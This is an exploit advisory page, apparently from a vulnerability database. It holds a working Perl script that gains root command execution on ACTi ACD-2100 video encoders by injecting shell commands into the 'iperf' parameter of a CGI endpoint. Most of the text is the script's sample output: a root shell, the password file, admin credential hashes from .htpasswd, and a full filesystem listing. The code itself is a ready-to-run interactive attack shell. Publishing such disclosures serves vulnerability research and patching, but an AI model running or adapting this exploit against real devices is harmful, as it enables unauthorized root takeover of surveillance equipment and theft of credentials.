ACTi ACD-2100 Video Encoder Remote Command Execution

2019.09.27
Credit: Todor Donev
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

#!/usr/bin/perl # # ACTi ACD-2100 Video Encoder Remote Command Execution Exploit # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # Firmware Version = A1D-220-V3.08.08-AC # Production ID = ACD2100-08E-X-00498 # Factory Default Type = NTSC, Composite, Two Ways Audio (0x71) # Company Name = ACTi Corporation # WEB Site = www.acti.com # Profile ID = ADV7180-RXX_V071030A # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # (Dont do anything without permissions) # # # [ ACTi ACD-2100 Video Encoder Remote Command Execution Exploit # # [ ============================================================ # # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com> # # [ Server: thttpd/2.25b 29dec2003 # # [ The target is vulnerable # # [ # # [ Directory Traversal # # [ http://192.168.1.1/cgi-bin/./ # # [ http://192.168.1.1/cgi-bin/../ # # [ http://192.168.1.1/cgi-bin/80503736 # # [ http://192.168.1.1/cgi-bin/cmd/ # # [ http://192.168.1.1/cgi-bin/encoder # # [ http://192.168.1.1/cgi-bin/macdev # # [ http://192.168.1.1/cgi-bin/mpeg4 # # [ http://192.168.1.1/cgi-bin/system # # [ http://192.168.1.1/cgi-bin/test # # [ http://192.168.1.1/cgi-bin/update # # [ http://192.168.1.1/cgi-bin/updatem # # [ http://192.168.1.1/cgi-bin/url.cgi # # [ http://192.168.1.1/cgi-bin/videoconfiguration.cgi # # [ http://192.168.1.1/cgi-bin/web1.cgi # # [ # # [ Got root? # # [ # id # # [ execute : /sbin/iperf -c ;id & # # [ uid=0(root) gid=0(root) # # [ # cat /etc/passwd # # [ execute : /sbin/iperf -c ;cat /etc/passwd & # # [ root::0:0:root:/root:/bin/bash # # [ bin:*:1:1:bin:/bin: # # [ daemon:*:2:2:daemon:/usr/sbin: # # [ sys:*:3:3:sys:/dev: # # [ adm:*:4:4:adm:/var/adm: # # [ lp:*:5:7:lp:/var/spool/lpd: # # [ sync:*:6:8:sync:/bin:/bin/sync # # [ shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown # # [ halt:*:8:10:halt:/sbin:/sbin/halt # # [ mail:*:9:11:mail:/var/spool/mail: # # [ news:*:10:12:news:/var/spool/news: # # [ uucp:*:11:13:uucp:/var/spool/uucp: # # [ operator:*:12:0:operator:/root: # # [ games:*:13:100:games:/usr/games: # # [ ftp:*:15:14:ftp:/var/ftp: # # [ man:*:16:100:man:/var/cache/man: # # [ nobody:*:65534:65534:nobody:/home:/bin/sh # # [ # ls -la /var/log # # [ execute : /sbin/iperf -c ;ls -la /var/log & # # [ -rw-r--r-- 1 0 0 259 system_info_url.txt # # [ -rw-r--r-- 1 0 0 259 system_info_web.txt # # [ -rw-r--r-- 1 0 0 94 wan_info_brief.txt # # [ -rw-r--r-- 1 0 0 455 systemlog.txt # # [ drwxr-xr-x 5 0 0 1024 .. # # [ drwxr-xr-x 2 0 0 1024 . # # [ # cat cmd/.htpasswd # # [ execute : /sbin/iperf -c ;cat cmd/.htpasswd & # # [ admin:rGtBkUV3A76PC # # [ Admin:rGtBkUV3A76PC # # [ # find / -type f # # [ execute : /sbin/iperf -c ;find / -type f & # # [ /bin/busybox # # [ /etc/fstab # # [ /etc/thttpd/thttpd.conf # # [ /etc/thttpd/thttpd.throttles # # [ /etc/services # # [ /etc/resolv.conf # # [ /etc/profile # # [ /etc/init.d/rcS # # [ /etc/init.d/bootstrap # # [ /etc/init.d/oem_load # # [ /etc/init.d/system_load # # [ /etc/init.d/thttpd # # [ /etc/init.d/daemon_manager # # [ /etc/init.d/modules # # [ /etc/init.d/ddns # # [ /etc/init.d/syslog # # [ /etc/init.d/hostname # # [ /etc/init.d/set_port_speed # # [ /etc/init.d/get_wan_config # # [ /etc/init.d/myserver # # [ /etc/init.d/wan # # [ /etc/init.d/datetime # # [ /etc/init.d/dns # # [ /etc/init.d/boot_sync # # [ /etc/init.d/profile_load # # [ /etc/init.d/datetime_rackmount # # [ /etc/group # # [ /etc/passwd # # [ /etc/host.conf # # [ /etc/inittab # # [ /etc/ppp/plugins/rp-pppoe.so # # [ /etc/ppp/resolv.conf # # [ /etc/ppp/ip-down # # [ /etc/ppp/ip-up # # [ /etc/protocols # # [ /etc/config/update.conf # # [ /etc/default/default.conf # # [ /etc/default/version # # [ /etc/default/default.pppoe # # [ /etc/default/build_date # # [ /etc/default/global_options # # [ /etc/default/boot_version # # [ /etc/default/profile/camera.bin # # [ /etc/default/profile/firmware.bin # # [ /etc/default/profile/profile_id # # [ /etc/default/profile/NameMap # # [ /etc/default/profile/fw_cap.bin # # [ /etc/default/model # # [ /etc/default/fw_type # # [ /etc/default/device # # [ /etc/default/mac # # [ /etc/default/serial # # [ /etc/default/property # # [ /etc/hosts # # [ /lib/ld-uClibc-0.9.15.so # # [ /lib/libcrypt-0.9.15.so # # [ /lib/libdl-0.9.15.so # # [ /lib/libm-0.9.15.so # # [ /lib/libpthread-0.9.15.so # # [ /lib/libresolv-0.9.15.so # # [ /lib/libuClibc-0.9.15.so # # [ /lib/libutil-0.9.15.so # # [ /lib/modules/2.4.19-rmk4/acap_drv.o # # [ /lib/modules/2.4.19-rmk4/ds1339_rtc.o # # [ /lib/modules/2.4.19-rmk4/sound_drv.o # # [ /proc/mtd # # [ /proc/asoc2200_eth/DATA # # [ /proc/misc # # [ /proc/cpu/alignment # # [ /proc/tty/drivers # # [ /proc/tty/ldiscs # # [ /proc/tty/driver/serial # # [ /proc/sys/abi/fake_utsname # # [ /proc/sys/abi/trace # # [ /proc/sys/abi/defhandler_libcso # # [ /proc/sys/abi/defhandler_lcall7 # # [ /proc/sys/abi/defhandler_elf # # [ /proc/sys/abi/defhandler_coff # # [ /proc/sys/fs/lease-break-time # # [ /proc/sys/fs/dir-notify-enable # # [ /proc/sys/fs/leases-enable # # [ /proc/sys/fs/overflowgid # # [ /proc/sys/fs/overflowuid # # [ /proc/sys/fs/dentry-state # # [ /proc/sys/fs/dquot-nr # # [ /proc/sys/fs/file-max # # [ /proc/sys/fs/file-nr # # [ /proc/sys/fs/inode-state # # [ /proc/sys/fs/inode-nr # # [ /proc/sys/net/unix/max_dgram_qlen # # [ /proc/sys/net/ipv4/conf/eth0/arp_filter # # [ /proc/sys/net/ipv4/conf/eth0/tag # # [ /proc/sys/net/ipv4/conf/eth0/log_martians # # [ /proc/sys/net/ipv4/conf/eth0/bootp_relay # # [ /proc/sys/net/ipv4/conf/eth0/medium_id # # [ /proc/sys/net/ipv4/conf/eth0/proxy_arp # # [ /proc/sys/net/ipv4/conf/eth0/accept_source_route # # [ /proc/sys/net/ipv4/conf/eth0/send_redirects # # [ /proc/sys/net/ipv4/conf/eth0/rp_filter # # [ /proc/sys/net/ipv4/conf/eth0/shared_media # # [ /proc/sys/net/ipv4/conf/eth0/secure_redirects # # [ /proc/sys/net/ipv4/conf/eth0/accept_redirects # # [ /proc/sys/net/ipv4/conf/eth0/mc_forwarding # # [ /proc/sys/net/ipv4/conf/eth0/forwarding # # [ /proc/sys/net/ipv4/conf/default/arp_filter # # [ /proc/sys/net/ipv4/conf/default/tag # # [ /proc/sys/net/ipv4/conf/default/log_martians # # [ /proc/sys/net/ipv4/conf/default/bootp_relay # # [ /proc/sys/net/ipv4/conf/default/medium_id # # [ /proc/sys/net/ipv4/conf/default/proxy_arp # # [ /proc/sys/net/ipv4/conf/default/accept_source_route # # [ /proc/sys/net/ipv4/conf/default/send_redirects # # [ /proc/sys/net/ipv4/conf/default/rp_filter # # [ /proc/sys/net/ipv4/conf/default/shared_media # # [ /proc/sys/net/ipv4/conf/default/secure_redirects # # [ /proc/sys/net/ipv4/conf/default/accept_redirects # # [ /proc/sys/net/ipv4/conf/default/mc_forwarding # # [ /proc/sys/net/ipv4/conf/default/forwarding # # [ /proc/sys/net/ipv4/conf/all/arp_filter # # [ /proc/sys/net/ipv4/conf/all/tag # # [ /proc/sys/net/ipv4/conf/all/log_martians # # [ /proc/sys/net/ipv4/conf/all/bootp_relay # # [ /proc/sys/net/ipv4/conf/all/medium_id # # [ /proc/sys/net/ipv4/conf/all/proxy_arp # # [ /proc/sys/net/ipv4/conf/all/accept_source_route # # [ /proc/sys/net/ipv4/conf/all/send_redirects # # [ /proc/sys/net/ipv4/conf/all/rp_filter # # [ /proc/sys/net/ipv4/conf/all/shared_media # # [ /proc/sys/net/ipv4/conf/all/secure_redirects # # [ /proc/sys/net/ipv4/conf/all/accept_redirects # # [ /proc/sys/net/ipv4/conf/all/mc_forwarding # # [ /proc/sys/net/ipv4/conf/all/forwarding # # [ /proc/sys/net/ipv4/neigh/eth0/locktime # # [ /proc/sys/net/ipv4/neigh/eth0/proxy_delay # # [ /proc/sys/net/ipv4/neigh/eth0/anycast_delay # # [ /proc/sys/net/ipv4/neigh/eth0/proxy_qlen # # [ /proc/sys/net/ipv4/neigh/eth0/unres_qlen # # [ /proc/sys/net/ipv4/neigh/eth0/gc_stale_time # # [ /proc/sys/net/ipv4/neigh/eth0/delay_first_probe_time # # [ /proc/sys/net/ipv4/neigh/eth0/base_reachable_time # # [ /proc/sys/net/ipv4/neigh/eth0/retrans_time # # [ /proc/sys/net/ipv4/neigh/eth0/app_solicit # # [ /proc/sys/net/ipv4/neigh/eth0/ucast_solicit # # [ /proc/sys/net/ipv4/neigh/eth0/mcast_solicit # # [ /proc/sys/net/ipv4/neigh/default/gc_thresh3 # # [ /proc/sys/net/ipv4/neigh/default/gc_thresh2 # # [ /proc/sys/net/ipv4/neigh/default/gc_thresh1 # # [ /proc/sys/net/ipv4/neigh/default/gc_interval # # [ /proc/sys/net/ipv4/neigh/default/locktime # # [ /proc/sys/net/ipv4/neigh/default/proxy_delay # # [ /proc/sys/net/ipv4/neigh/default/anycast_delay # # [ /proc/sys/net/ipv4/neigh/default/proxy_qlen # # [ /proc/sys/net/ipv4/neigh/default/unres_qlen # # [ /proc/sys/net/ipv4/neigh/default/gc_stale_time # # [ /proc/sys/net/ipv4/neigh/default/delay_first_probe_time # # [ /proc/sys/net/ipv4/neigh/default/base_reachable_time # # [ /proc/sys/net/ipv4/neigh/default/retrans_time # # [ /proc/sys/net/ipv4/neigh/default/app_solicit # # [ /proc/sys/net/ipv4/neigh/default/ucast_solicit # # [ /proc/sys/net/ipv4/neigh/default/mcast_solicit # # [ /proc/sys/net/ipv4/tcp_tw_reuse # # [ /proc/sys/net/ipv4/icmp_ratemask # # [ /proc/sys/net/ipv4/icmp_ratelimit # # [ /proc/sys/net/ipv4/tcp_adv_win_scale # # [ /proc/sys/net/ipv4/tcp_app_win # # [ /proc/sys/net/ipv4/tcp_rmem # # [ /proc/sys/net/ipv4/tcp_wmem # # [ /proc/sys/net/ipv4/tcp_mem # # [ /proc/sys/net/ipv4/tcp_dsack # # [ /proc/sys/net/ipv4/tcp_ecn # # [ /proc/sys/net/ipv4/tcp_reordering # # [ /proc/sys/net/ipv4/tcp_fack # # [ /proc/sys/net/ipv4/tcp_orphan_retries # # [ /proc/sys/net/ipv4/inet_peer_gc_maxtime # # [ /proc/sys/net/ipv4/inet_peer_gc_mintime # # [ /proc/sys/net/ipv4/inet_peer_maxttl # # [ /proc/sys/net/ipv4/inet_peer_minttl # # [ /proc/sys/net/ipv4/inet_peer_threshold # # [ /proc/sys/net/ipv4/route/min_adv_mss # # [ /proc/sys/net/ipv4/route/min_pmtu # # [ /proc/sys/net/ipv4/route/mtu_expires # # [ /proc/sys/net/ipv4/route/gc_elasticity # # [ /proc/sys/net/ipv4/route/error_burst # # [ /proc/sys/net/ipv4/route/error_cost # # [ /proc/sys/net/ipv4/route/redirect_silence # # [ /proc/sys/net/ipv4/route/redirect_number # # [ /proc/sys/net/ipv4/route/redirect_load # # [ /proc/sys/net/ipv4/route/gc_interval # # [ /proc/sys/net/ipv4/route/gc_timeout # # [ /proc/sys/net/ipv4/route/gc_min_interval # # [ /proc/sys/net/ipv4/route/max_size # # [ /proc/sys/net/ipv4/route/gc_thresh # # [ /proc/sys/net/ipv4/route/max_delay # # [ /proc/sys/net/ipv4/route/min_delay # # [ /proc/sys/net/ipv4/route/flush # # [ /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses # # [ /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts # # [ /proc/sys/net/ipv4/icmp_echo_ignore_all # # [ /proc/sys/net/ipv4/ip_local_port_range # # [ /proc/sys/net/ipv4/tcp_max_syn_backlog # # [ /proc/sys/net/ipv4/tcp_rfc1337 # # [ /proc/sys/net/ipv4/tcp_stdurg # # [ /proc/sys/net/ipv4/tcp_abort_on_overflow # # [ /proc/sys/net/ipv4/tcp_tw_recycle # # [ /proc/sys/net/ipv4/tcp_fin_timeout # # [ /proc/sys/net/ipv4/tcp_retries2 # # [ /proc/sys/net/ipv4/tcp_retries1 # # [ /proc/sys/net/ipv4/tcp_keepalive_intvl # # [ /proc/sys/net/ipv4/tcp_keepalive_probes # # [ /proc/sys/net/ipv4/tcp_keepalive_time # # [ /proc/sys/net/ipv4/ipfrag_time # # [ /proc/sys/net/ipv4/ip_dynaddr # # [ /proc/sys/net/ipv4/ipfrag_low_thresh # # [ /proc/sys/net/ipv4/ipfrag_high_thresh # # [ /proc/sys/net/ipv4/tcp_max_tw_buckets # # [ /proc/sys/net/ipv4/tcp_max_orphans # # [ /proc/sys/net/ipv4/tcp_synack_retries # # [ /proc/sys/net/ipv4/tcp_syn_retries # # [ /proc/sys/net/ipv4/ip_nonlocal_bind # # [ /proc/sys/net/ipv4/ip_no_pmtu_disc # # [ /proc/sys/net/ipv4/ip_autoconfig # # [ /proc/sys/net/ipv4/ip_default_ttl # # [ /proc/sys/net/ipv4/ip_forward # # [ /proc/sys/net/ipv4/tcp_retrans_collapse # # [ /proc/sys/net/ipv4/tcp_sack # # [ /proc/sys/net/ipv4/tcp_window_scaling # # [ /proc/sys/net/ipv4/tcp_timestamps # # [ /proc/sys/net/core/hot_list_length # # [ /proc/sys/net/core/optmem_max # # [ /proc/sys/net/core/message_burst # # [ /proc/sys/net/core/message_cost # # [ /proc/sys/net/core/mod_cong # # [ /proc/sys/net/core/lo_cong # # [ /proc/sys/net/core/no_cong # # [ /proc/sys/net/core/no_cong_thresh # # [ /proc/sys/net/core/netdev_max_backlog # # [ /proc/sys/net/core/rmem_default # # [ /proc/sys/net/core/wmem_default # # [ /proc/sys/net/core/rmem_max # # [ /proc/sys/net/core/wmem_max # # [ /proc/sys/vm/max_map_count # # [ /proc/sys/vm/max-readahead # # [ /proc/sys/vm/min-readahead # # [ /proc/sys/vm/page-cluster # # [ /proc/sys/vm/pagetable_cache # # [ /proc/sys/vm/kswapd # # [ /proc/sys/vm/overcommit_memory # # [ /proc/sys/vm/bdflush # # [ /proc/sys/kernel/overflowgid # # [ /proc/sys/kernel/overflowuid # # [ /proc/sys/kernel/random/uuid # # [ /proc/sys/kernel/random/boot_id # # [ /proc/sys/kernel/random/write_wakeup_threshold # # [ /proc/sys/kernel/random/read_wakeup_threshold # # [ /proc/sys/kernel/random/entropy_avail # # [ /proc/sys/kernel/random/poolsize # # [ /proc/sys/kernel/threads-max # # [ /proc/sys/kernel/cad_pid # # [ /proc/sys/kernel/sem # # [ /proc/sys/kernel/msgmnb # # [ /proc/sys/kernel/msgmni # # [ /proc/sys/kernel/msgmax # # [ /proc/sys/kernel/shmmni # # [ /proc/sys/kernel/shmall # # [ /proc/sys/kernel/shmmax # # [ /proc/sys/kernel/rtsig-max # # [ /proc/sys/kernel/rtsig-nr # # [ /proc/sys/kernel/printk # # [ /proc/sys/kernel/ctrl-alt-del # # [ /proc/sys/kernel/real-root-dev # # [ /proc/sys/kernel/cap-bound # # [ /proc/sys/kernel/tainted # # [ /proc/sys/kernel/core_uses_pid # # [ /proc/sys/kernel/panic # # [ /proc/sys/kernel/domainname # # [ /proc/sys/kernel/hostname # # [ /proc/sys/kernel/version # # [ /proc/sys/kernel/osrelease # # [ /proc/sys/kernel/ostype # # [ /proc/sysvipc/shm # # [ /proc/sysvipc/msg # # [ /proc/sysvipc/sem # # [ /proc/net/packet # # [ /proc/net/unix # # [ /proc/net/udp # # [ /proc/net/tcp # # [ /proc/net/sockstat # # [ /proc/net/snmp # # [ /proc/net/netstat # # [ /proc/net/raw # # [ /proc/net/rt_cache_stat # # [ /proc/net/rt_cache # # [ /proc/net/route # # [ /proc/net/arp # # [ /proc/net/netlink # # [ /proc/net/pppoe # # [ /proc/net/dev_mcast # # [ /proc/net/softnet_stat # # [ /proc/net/dev # # [ /proc/kcore # # [ /proc/ksyms # # [ /proc/slabinfo # # [ /proc/cpuinfo # # [ /proc/kmsg # # [ /proc/execdomains # # [ /proc/iomem # # [ /proc/swaps # # [ /proc/locks # # [ /proc/cmdline # # [ /proc/ioports # # [ /proc/filesystems # # [ /proc/interrupts # # [ /proc/partitions # # [ /proc/devices # # [ /proc/stat # # [ /proc/modules # # [ /proc/version # # [ /proc/meminfo # # [ /proc/uptime # # [ /proc/loadavg # # [ /proc/1/environ # # [ /proc/1/status # # [ /proc/1/cmdline # # [ /proc/1/stat # # [ /proc/1/statm # # [ /proc/1/maps # # [ /proc/1/mem # # [ /proc/1/mounts # # [ /proc/2/environ # # [ /proc/2/status # # [ /proc/2/cmdline # # [ /proc/2/stat # # [ /proc/2/statm # # [ /proc/2/maps # # [ /proc/2/mem # # [ /proc/2/mounts # # [ /proc/3/environ # # [ /proc/3/status # # [ /proc/3/cmdline # # [ /proc/3/stat # # [ /proc/3/statm # # [ /proc/3/maps # # [ /proc/3/mem # # [ /proc/3/mounts # # [ /proc/4/environ # # [ /proc/4/status # # [ /proc/4/cmdline # # [ /proc/4/stat # # [ /proc/4/statm # # [ /proc/4/maps # # [ /proc/4/mem # # [ /proc/4/mounts # # [ /proc/5/environ # # [ /proc/5/status # # [ /proc/5/cmdline # # [ /proc/5/stat # # [ /proc/5/statm # # [ /proc/5/maps # # [ /proc/5/mem # # [ /proc/5/mounts # # [ /proc/6/environ # # [ /proc/6/status # # [ /proc/6/cmdline # # [ /proc/6/stat # # [ /proc/6/statm # # [ /proc/6/maps # # [ /proc/6/mem # # [ /proc/6/mounts # # [ find: /proc/7/fd: No such file or directory # # [ /proc/7/environ # # [ /proc/7/status # # [ /proc/7/cmdline # # [ /proc/7/stat # # [ /proc/7/statm # # [ /proc/7/maps # # [ /proc/7/mem # # [ /proc/7/mounts # # [ /proc/14/environ # # [ /proc/14/status # # [ /proc/14/cmdline # # [ /proc/14/stat # # [ /proc/14/statm # # [ /proc/14/maps # # [ /proc/14/mem # # [ /proc/14/mounts # # [ /proc/132/environ # # [ /proc/132/status # # [ /proc/132/cmdline # # [ /proc/132/stat # # [ /proc/132/statm # # [ /proc/132/maps # # [ /proc/132/mem # # [ /proc/132/mounts # # [ /proc/142/environ # # [ /proc/142/status # # [ /proc/142/cmdline # # [ /proc/142/stat # # [ /proc/142/statm # # [ /proc/142/maps # # [ /proc/142/mem # # [ /proc/142/mounts # # [ /proc/153/environ # # [ /proc/153/status # # [ /proc/153/cmdline # # [ /proc/153/stat # # [ /proc/153/statm # # [ /proc/153/maps # # [ /proc/153/mem # # [ /proc/153/mounts # # [ /proc/155/environ # # [ /proc/155/status # # [ /proc/155/cmdline # # [ /proc/155/stat # # [ /proc/155/statm # # [ /proc/155/maps # # [ /proc/155/mem # # [ /proc/155/mounts # # [ /proc/157/environ # # [ /proc/157/status # # [ /proc/157/cmdline # # [ /proc/157/stat # # [ /proc/157/statm # # [ /proc/157/maps # # [ /proc/157/mem # # [ /proc/157/mounts # # [ /proc/158/environ # # [ /proc/158/status # # [ /proc/158/cmdline # # [ /proc/158/stat # # [ /proc/158/statm # # [ /proc/158/maps # # [ /proc/158/mem # # [ /proc/158/mounts # # [ /proc/171/environ # # [ /proc/171/status # # [ /proc/171/cmdline # # [ /proc/171/stat # # [ /proc/171/statm # # [ /proc/171/maps # # [ /proc/171/mem # # [ /proc/171/mounts # # [ /proc/172/environ # # [ /proc/172/status # # [ /proc/172/cmdline # # [ /proc/172/stat # # [ /proc/172/statm # # [ /proc/172/maps # # [ /proc/172/mem # # [ /proc/172/mounts # # [ /proc/173/environ # # [ /proc/173/status # # [ /proc/173/cmdline # # [ /proc/173/stat # # [ /proc/173/statm # # [ /proc/173/maps # # [ /proc/173/mem # # [ /proc/173/mounts # # [ /proc/174/environ # # [ /proc/174/status # # [ /proc/174/cmdline # # [ /proc/174/stat # # [ /proc/174/statm # # [ /proc/174/maps # # [ /proc/174/mem # # [ /proc/174/mounts # # [ /proc/175/environ # # [ /proc/175/status # # [ /proc/175/cmdline # # [ /proc/175/stat # # [ /proc/175/statm # # [ /proc/175/maps # # [ /proc/175/mem # # [ /proc/175/mounts # # [ /proc/26407/environ # # [ /proc/26407/status # # [ /proc/26407/cmdline # # [ /proc/26407/stat # # [ /proc/26407/statm # # [ /proc/26407/maps # # [ /proc/26407/mem # # [ /proc/26407/mounts # # [ /proc/26410/environ # # [ /proc/26410/status # # [ /proc/26410/cmdline # # [ /proc/26410/stat # # [ /proc/26410/statm # # [ /proc/26410/maps # # [ /proc/26410/mem # # [ /proc/26410/mounts # # [ /sbin/dhcpcd # # [ /sbin/ez-ipupdate # # [ /sbin/htpasswd # # [ /sbin/iperf # # [ /sbin/thttpd # # [ /usr/sbin/mount_nfs_drive # # [ /usr/sbin/ll # # [ /usr/sbin/system_info # # [ /usr/sbin/read_dev_info # # [ /usr/sbin/acti_config # # [ /usr/sbin/show_progress # # [ /usr/sbin/ddns_monitor # # [ /usr/sbin/wan_status # # [ /usr/sbin/adsl-connect # # [ /usr/sbin/adsl-setup # # [ /usr/sbin/acti_report # # [ /usr/sbin/pppd # # [ /usr/sbin/pppoe # # [ /usr/sbin/acti_upgrade # # [ /usr/sbin/thttpd_monitor # # [ /usr/sbin/acti_485 # # [ /usr/sbin/dbg # # [ /usr/sbin/ntpclient # # [ /usr/sbin/acti_upgradem # # [ /usr/sbin/dhcp_retry # # [ /usr/sbin/pppoe_monitor # # [ /usr/sbin/acti_reboot # # [ /usr/sbin/acti_msg # # [ /usr/sbin/mount_tmpfs # # [ /usr/sbin/shell_relay # # [ /usr/sbin/acti_logger # # [ /usr/sbin/boot_ctrl # # [ /usr/sbin/acti_gpio # # [ /usr/sbin/acti_rs485 # # [ /usr/sbin/acti_rtc # # [ /usr/sbin/acti_reg # # [ /usr/sbin/conf_sync # # [ /usr/sbin/conf_convert # # [ /usr/sbin/bin2devinfo # # [ /usr/sbin/audio_tester # # [ /usr/sbin/bin2profile # # [ /usr/sbin/acti-server # # [ /usr/bin/setsid # # [ /var/run/dev.bin # # [ /var/run/system_type # # [ /var/run/channel # # [ /var/run/sys_conf.bin # # [ /var/run/wan_state # # [ /var/run/wanip_config # # [ /var/run/encoder_run # # [ /var/log/systemlog.txt # # [ /var/log/wan_info_brief.txt # # [ /var/log/system_info_web.txt # # [ /var/log/system_info_url.txt # # [ /var/www/images/Space.gif # # [ /var/www/images/bar.gif # # [ /var/www/images/bar2.gif # # [ /var/www/images/icon.gif # # [ /var/www/images/layout.gif # # [ /var/www/images/r0-100.gif # # [ /var/www/images/header_red.jpg # # [ /var/www/images/ie_error.bmp # # [ /var/www/images/r0-255.gif # # [ /var/www/images/ptz_center_1.gif # # [ /var/www/images/ptz_down_1.gif # # [ /var/www/images/ptz_left_1.gif # # [ /var/www/images/ptz_leftdown_1.gif # # [ /var/www/images/ptz_leftup_1.gif # # [ /var/www/images/ptz_right_1.gif # # [ /var/www/images/ptz_rightdown_1.gif # # [ /var/www/images/ptz_rightup_1.gif # # [ /var/www/images/ptz_up_1.gif # # [ /var/www/images/add.jpg # # [ /var/www/images/delete.jpg # # [ /var/www/images/focusin.jpg # # [ /var/www/images/focusout.jpg # # [ /var/www/images/home.jpg # # [ /var/www/images/reset.jpg # # [ /var/www/images/tele.jpg # # [ /var/www/images/wide.jpg # # [ /var/www/images/Num00.jpg # # [ /var/www/images/Num01.jpg # # [ /var/www/cgi-bin/cmd/system # # [ /var/www/cgi-bin/cmd/mpeg4 # # [ /var/www/cgi-bin/cmd/encoder # # [ /var/www/cgi-bin/cmd/.htpasswd # # [ /var/www/cgi-bin/80503736 # # [ /var/www/cgi-bin/update # # [ /var/www/cgi-bin/updatem # # [ /var/www/cgi-bin/macdev # # [ /var/www/cgi-bin/system # # [ /var/www/cgi-bin/mpeg4 # # [ /var/www/cgi-bin/test # # [ /var/www/cgi-bin/encoder # # [ /var/www/cgi-bin/web1.cgi # # [ /var/www/default.css # # [ /var/www/index.htm # # [ /var/www/profile/cze.bin # # [ /var/www/profile/dan.bin # # [ /var/www/profile/eng.bin # # [ /var/www/profile/fin.bin # # [ /var/www/profile/fre.bin # # [ /var/www/profile/ger.bin # # [ /var/www/profile/hun.bin # # [ /var/www/profile/ita.bin # # [ /var/www/profile/jap.bin # # [ /var/www/profile/lang_table.bin # # [ /var/www/profile/por.bin # # [ /var/www/profile/sch.bin # # [ /var/www/profile/spa.bin # # [ /var/www/profile/tch.bin # # [ /var/www/nvEPLMedia.ocx # # [ /var/www/pid # # [ # # # use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use HTML::TreeBuilder; $| = 1; print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 print "[ ACTi ACD-2100 Video Encoder Remote Command Execution Exploit [ ============================================================ [ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com> "; if(not defined $ARGV[0]) { print "[ Usage: perl $0 [target]\n"; print "[ Example: perl $0 192.168.1.1\n\n"; exit; } my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(); $browser->timeout(10); $browser->agent($user_agent); my $target = $host."/cgi-bin/"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request); print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401'); if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){ print "[ Server: ", $response->header('Server'), "\n"; print "[ The target is vulnerable\n"; print "[\n[ Directory Traversal\n"; my $tree = HTML::TreeBuilder->new_from_content($response->as_string()); my @files = $tree->look_down(_tag => 'a'); print "[ ", $host.$_->attr('href'), "\n" for @files; print "[\n[ Got root?\n"; while(1){ my $cmd; print "[ \# "; chomp($cmd = <STDIN>); if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';} exit if $cmd eq 'exit'; my $target = $host."/cgi-bin/test?iperf=;".$cmd; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request) or die "[ Exploit Failed: $!"; print "[ ", $_, "\n" for split(/\n/,$response->content()); } } else { print "[ Exploit failed! The target isn't vulnerable\n"; exit; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top